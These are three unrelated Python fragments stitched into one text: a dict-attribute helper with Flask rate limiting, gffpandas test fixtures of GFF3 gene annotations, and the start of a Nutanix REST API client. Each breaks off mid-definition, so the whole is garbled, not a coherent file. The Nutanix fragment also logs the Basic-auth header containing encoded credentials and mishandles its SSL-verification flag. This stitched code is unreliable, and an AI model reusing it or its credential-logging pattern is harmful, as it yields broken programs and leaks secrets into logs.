"""Subclass dict to treat new dicts like objects"""
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
def __setattr__(self, name, value):
self[name] = value
def __delattr__(self, name):
if name in self:
del self[name]
else:
raise AttributeError("No such attribute: " + name)
def datetime_as_naive_utc(value):
if not isinstance(value, datetime.datetime):
raise TypeError("datetime_as_naive_utc() only works on datetime.datetime values")
if value.tzinfo is None:
return value
else:
return value.astimezone(pytz.UTC).replace(tzinfo=None)
def is_care_evo_and_not_prod():
return GAE_PROJECT != "all-of-us-rdr-prod" and get_account_origin_id() == "careevolution"
def install_rate_limiting(app):
cache_location = config.getSettingJson('cache_storage_location', default='memory://')
default_rate_limit = config.getSettingJson('default_rate_limit', default='15/second')
Limiter(
app,
key_func=lambda: get_oauth_id() or get_remote_address(),
default_limits=[default_rate_limit],
storage_uri=cache_location,
in_memory_fallback_enabled=True # Use local memory if cache not found (throws an error otherwise)
)
class BatchManager:
"""Useful for applying a function to a batch of objects."""
def | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `gffpandas` package."""
# standard library imports
import shutil
import time
from pathlib import Path
# first-party imports
import gffpandas.gffpandas as gff3pd
# third-party imports
import pandas as pd
# module imports
from . import print_docstring
# global constants
REFSEQ_URL = (
"https://ftp.ncbi.nih.gov/genomes/refseq/vertebrate_mammalian"
+ "/Homo_sapiens/annotation_releases/109.20191205/GCF_000001405.39_GRCh38.p13/"
)
HUMAN_GFF = "GCF_000001405.39_GRCh38.p13_genomic.gff"
TESTFILELIST = ["test_file.gff"]
written_df = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"region",
1,
4000,
".",
"+",
".",
"Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type="
"genomic DNA;serovar=Typhimurium;strain=SL1344",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
13,
235,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
341,
523,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
21,
345,
".",
"-",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
61,
195,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
170,
546,
".",
"+",
".",
"ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
34,
335,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
)
written_header = "##gff-version 3\n" "##sequence-region NC_016810.1 1 20\n"
written_csv = (
"seq_id,source,type,start,end,score,strand,phase,attributes\n"
"NC_016810.1,RefSeq,region,1,4000,.,+,.,Dbxref=taxon:216597;ID="
"id0;gbkey=Src;genome=genomic;mol_type=genomic DNA;serovar="
"Typhimurium;strain=SL1344\n"
"NC_016810.1,RefSeq,gene,1,20,.,+,.,ID=gene1;Name=thrL;gbkey="
"Gene;gene=thrL;locus_tag=SL1344_0001\n"
"NC_016810.1,RefSeq,CDS,13,235,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,1,20,.,+,.,ID=gene2;Name=thrA;gbkey="
"Gene;gene=thrA;locus_tag=SL1344_0002\n"
"NC_016810.1,RefSeq,CDS,341,523,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,1,600,.,-,.,ID=gene3;Name=thrX;gbkey="
"Gene;gene=thrX;locus_tag=SL1344_0003\n"
"NC_016810.1,RefSeq,CDS,21,345,.,-,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene3;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,41,255,.,+,.,ID=gene4;Name=thrB;gbkey="
"Gene;gene=thrB;locus_tag=SL1344_0004\n"
"NC_016810.1,RefSeq,CDS,61,195,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1,RefSeq,gene,170,546,.,+,.,ID=gene5;Name=thrC;gbkey"
"=Gene;gene=thrC;locus_tag=SL1344_0005\n"
"NC_016810.1,RefSeq,CDS,34,335,.,+,0,Dbxref=UniProtKB%252FTr"
"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene5;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
)
written_tsv = (
"seq_id\tsource\ttype\tstart\tend\tscore\tstrand\tphase\t"
"attributes\n"
"NC_016810.1\tRefSeq\tregion\t1\t4000\t.\t+\t.\tDbxref=taxon:21"
"6597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic DNA;"
"serovar=Typhimurium;strain=SL1344\n"
"NC_016810.1\tRefSeq\tgene\t1\t20\t.\t+\t.\tID=gene1;Name=thrL;"
"gbkey=Gene;gene=thrL;locus_tag=SL1344_0001\n"
"NC_016810.1\tRefSeq\tCDS\t13\t235\t.\t+\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene1;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t1\t20\t.\t+\t.\tID=gene2;Name=thrA;"
"gbkey=Gene;gene=thrA;locus_tag=SL1344_0002\n"
"NC_016810.1\tRefSeq\tCDS\t341\t523\t.\t+\t0\tDbxref=UniProtKB%"
"252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_005"
"179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t1\t600\t.\t-\t.\tID=gene3;Name=thrX"
";gbkey=Gene;gene=thrX;locus_tag=SL1344_0003\n"
"NC_016810.1\tRefSeq\tCDS\t21\t345\t.\t-\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene3;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t41\t255\t.\t+\t.\tID=gene4;Name="
"thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004\n"
"NC_016810.1\tRefSeq\tCDS\t61\t195\t.\t+\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene4;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t170\t546\t.\t+\t.\tID=gene5;Name="
"thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005\n"
"NC_016810.1\tRefSeq\tCDS\t34\t335\t.\t+\t0\tDbxref=UniProt"
"KB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name="
"YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon "
"leader peptide;protein_id=YP_005179941.1;transl_table=11\n"
)
written_gff = (
"##gff-version 3\n"
"##sequence-region NC_016810.1 1 20\n"
"NC_016810.1 RefSeq region 1 4000 . +"
" . Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=ge"
"nomic;mol_type=genomic DNA;serovar=Typhimurium;strain=SL1344\n"
"NC_016810.1 RefSeq gene 1 20 . +"
" . ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_"
"tag=SL1344_0001\n"
"NC_016810.1 RefSeq CDS 13 235 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene1;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 1 20 . +"
" . ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_"
"tag=SL1344_0002\n"
"NC_016810.1 RefSeq CDS 341 523 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene2;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 1 600 . -"
" . ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_"
"tag=SL1344_0003\n"
"NC_016810.1 RefSeq CDS 21 345 . -"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene3;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 41 255 . +"
" . ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_"
"tag=SL1344_0004\n"
"NC_016810.1 RefSeq CDS 61 195 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene4;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 170 546 . +"
" . ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_"
"tag=SL1344_0005\n"
"NC_016810.1 RefSeq CDS 34 335 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene5;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
)
written_filtered_length = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
13,
235,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
341,
523,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
61,
195,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[1, 2, 3, 4, 7, 8],
)
compare_get_feature_by_attribute = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
],
[
"NC_016810.1",
"RefSeq",
"gene",
170,
546,
".",
"+",
".",
"ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[1, 3, 5, 7, 9],
)
compare_get_feature_by_attribute2 = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"CDS",
341,
523,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
21,
345,
".",
"-",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
61,
195,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
"cds0;Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon"
" leader peptide;protein_id=YP_005179941.1;transl_table=11",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[4, 6, 8],
)
written_attribute_df = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"region",
1,
4000,
".",
"+",
".",
"Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic"
" DNA;serovar=Typhimurium;strain=SL1344",
"taxon:216597",
"id0",
None,
None,
"Src",
None,
"genomic",
None,
"genomic DNA",
None,
None,
"Typhimurium",
"SL1344",
None,
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
None,
"gene1",
"thrL",
None,
"Gene",
"thrL",
None,
"SL1344_0001",
None,
None,
None,
None,
None,
None,
],
[
"NC_016810.1",
"RefSeq",
"CDS",
13,
235,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
"Name=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader"
" peptide;protein_id=YP_005179941.1;transl_table=11",
"UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
"cds0",
"YP_005179941.1",
"gene1",
"CDS",
None,
None,
None,
None,
"thr operon leader peptide",
"YP_005179941.1",
None,
None,
"11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
None,
"gene2",
"thrA",
None,
"Gene",
"thrA",
None,
"SL1344_0002",
None,
None,
None,
None,
None,
None,
],
[
"NC_016810.1",
"RefSeq",
"CDS",
341,
523,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
"Name=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader"
" peptide;protein_id=YP_005179941.1;transl_table=11",
"UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
"cds0",
"YP_005179941.1",
"gene2",
"CDS",
None,
None,
None,
None,
"thr operon leader peptide",
"YP_005179941.1",
None,
None,
"11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
None,
"gene3",
"thrX",
None,
"Gene",
"thrX",
None,
"SL1344_0003",
None,
None,
None,
None,
None,
None,
],
[
"NC_016810.1",
"RefSeq",
"CDS",
21,
345,
".",
"-",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
"Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon leader"
" peptide;protein_id=YP_005179941.1;transl_table=11",
"UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
"cds0",
"YP_005179941.1",
"gene3",
"CDS",
None,
None,
None,
None,
"thr operon leader peptide",
"YP_005179941.1",
None,
None,
"11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
None,
"gene4",
"thrB",
None,
"Gene",
"thrB",
None,
"SL1344_0004",
None,
None,
None,
None,
None,
None,
],
[
"NC_016810.1",
"RefSeq",
"CDS",
61,
195,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
"Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader"
" peptide;protein_id=YP_005179941.1;transl_table=11",
"UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
"cds0",
"YP_005179941.1",
"gene4",
"CDS",
None,
None,
None,
None,
"thr operon leader peptide",
"YP_005179941.1",
None,
None,
"11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
170,
546,
".",
"+",
".",
"ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
None,
"gene5",
"thrC",
None,
"Gene",
"thrC",
None,
"SL1344_0005",
None,
None,
None,
None,
None,
None,
],
[
"NC_016810.1",
"RefSeq",
"CDS",
34,
335,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
"Name=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon leader"
" peptide;protein_id=YP_005179941.1;transl_table=11",
"UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
"cds0",
"YP_005179941.1",
"gene5",
"CDS",
None,
None,
None,
None,
"thr operon leader peptide",
"YP_005179941.1",
None,
None,
"11",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
"Dbxref",
"ID",
"Name",
"Parent",
"gbkey",
"gene",
"genome",
"locus_tag",
"mol_type",
"product",
"protein_id",
"serovar",
"strain",
"transl_table",
],
)
strand_counts = pd.value_counts(written_df["strand"]).to_dict()
type_counts = pd.value_counts(written_df["type"]).to_dict()
compare_stats_dic = {
"Maximal_bp_length": 599,
"Minimal_bp_length": 19,
"Counted_strands": strand_counts,
"Counted_feature_types": type_counts,
}
df_empty = pd.DataFrame(
{},
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[],
)
redundant_entry = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[3],
)
compare_filter_feature_df = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
],
[
"NC_016810.1",
"RefSeq",
"gene",
170,
546,
".",
"+",
".",
"ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[1, 3, 5, 7, 9],
)
compare_overlap_gene_1_40 = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
],
[
"NC_016810.1",
"RefSeq",
"gene",
1,
20,
".",
"+",
".",
"ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[1, 3],
)
compare_overlap_40_300 = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"region",
1,
4000,
".",
"+",
".",
"Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic DNA"
";serovar=Typhimurium;strain=SL1344",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
13,
235,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
41,
255,
".",
"+",
".",
"ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
61,
195,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
[
"NC_016810.1",
"RefSeq",
"gene",
170,
546,
".",
"+",
".",
"ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
34,
335,
".",
"+",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
],
columns=[
"seq_id",
"source",
"type",
"start",
"end",
"score",
"strand",
"phase",
"attributes",
],
index=[0, 2, 7, 8, 9, 10],
)
compare_overlap_170_171 = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
21,
345,
".",
"-",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
],
| |
import json
import os
import urllib3
import time
urllib3.disable_warnings() #for now
import requests #https://requests.readthedocs.io/en/master/
from base64 import b64encode
import logging
from jinja2 import Template
import humanfriendly
from urllib.parse import urlparse
from urllib.parse import urlencode
class NutanixAPI:
def __init__(self,url,username,password,log_file,log_level,ssl_verify=True,max_results=99999):
"""
Creates Nutanix API object
Args:
url ([string]): URL of API en dpoint
username (string): username
password ([string]): password
log_file ([string]): logfile , where operations is logged
log_level ([type]): logging.DEBUG/logging.WARNING/logging.INFO,
ssl_verify (bool, optional): SSL verification. Defaults to True. #not implemented properly
max_results (int, optional): maximum number of returned results. Defaults to 99999.
"""
# Initialise the options.
self.url = url
self.username = username.replace('\n', '')
self.password = password.replace('\n', '')
self.ssl_verify=ssl_verify
self.max_results=99999
logging.basicConfig(filename=log_file,level=log_level,format='%(asctime)s %(message)s')
if(self.ssl_verify==True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Create a REST client session.
def rest_call(self,method,sub_url,data=None):
req_url = f'{self.url}/api/nutanix/v3/{sub_url}'
#request_url = 'https://10.99.134.250:9440/api/nutanix/v3/vms/list'
try:
encoded_credentials = b64encode(bytes(f'{self.username}:{self.password}',encoding='ascii')).decode('ascii')
headers={}
headers["Authorization"]=f'Basic {encoded_credentials}'
headers["Content-Type"]="application/json"
headers["Accept"]="application/json"
headers["cache-control"]="no-cache"
if method.upper() in {"POST"}: #need data
encoded_data=json.dumps(data).encode('utf-8')
logging.debug("rest_call url:")
logging.debug(req_url)
logging.debug("rest_call headers:")
logging.debug(headers)
logging.debug("rest_call data:")
logging.debug(encoded_data)
response = requests.request(method.upper(), req_url, data=encoded_data, headers=headers,verify=self.ssl_verify)
logging.debug(f"rest_call response status code {response.status_code}")
logging.debug("rest_call response:")
logging.debug(response.json())
elif method.upper() in {"GET"}: #does not need data
logging.debug("rest_call GET url:")
logging.debug(req_url)
logging.debug("rest_call headers:")
logging.debug(headers)
response = requests.request(method.upper(),req_url,headers=headers,verify=self.ssl_verify)
logging.debug(f"rest_call response status code {response.status_code}")
logging.debug("rest_call response:")
logging.debug(response.json())
elif method.upper() in {"PUT"}: #does not need data
encoded_data=json.dumps(data).encode('utf-8')
logging.debug("rest_call PUT url:")
logging.debug(req_url)
logging.debug("rest_call headers:")
logging.debug(headers)
logging.debug("rest_call data:")
logging.debug(encoded_data)
response = requests.request(method.upper(), req_url, data=encoded_data, headers=headers,verify=self.ssl_verify)
logging.debug(f"rest_call response status code {response.status_code}")
logging.debug("rest_call response:")
logging.debug(response.json())
else:
raise ValueError("Unsupported method") #will implement later
except BaseException as ex:
print(repr(ex))
return response
def _get_templ_path(self,template_dir,template_name):
full_path=os.path.join(template_dir,template_name)
return full_path
def _read_file(self,path):
"""
Read a cloud-init template from file.
Args:
path (String): path to the file
"""
with open(path, 'r') as content_file:
content = content_file.read()
return content
def _write_file(self,path,data):
"""
Write data to a file
use in debugging
Args:
path (String): path to the file
data (String): data to save in file
"""
with open(path, 'w') as f:
f.write(data)
def _prepare_user_data_managed(self,template_dir,nework_cfg):
"""
Gets network configuration as and creates cloud-init file
which genereates proper configuration and encodes it for use in vm
creation in Nutanix managed networks
Args:
"""
cloud_init_file=self._read_file(self._get_templ_path(template_dir,"cloud-init.yaml.j2"))
t_ci=Template(cloud_init_file)
rendered_template=t_ci.render()
#self._write_file("c:\\temp\\user_data.yaml",rendered_template)
user_data=b64encode(rendered_template.encode()).decode('ascii')
logging.debug(f"UserData:{user_data}")
return user_data
def _prepare_user_data_unmanaged(self,template_dir,net_cfg):
"""
Gets network configuration as dictionary and creates cloud-init file
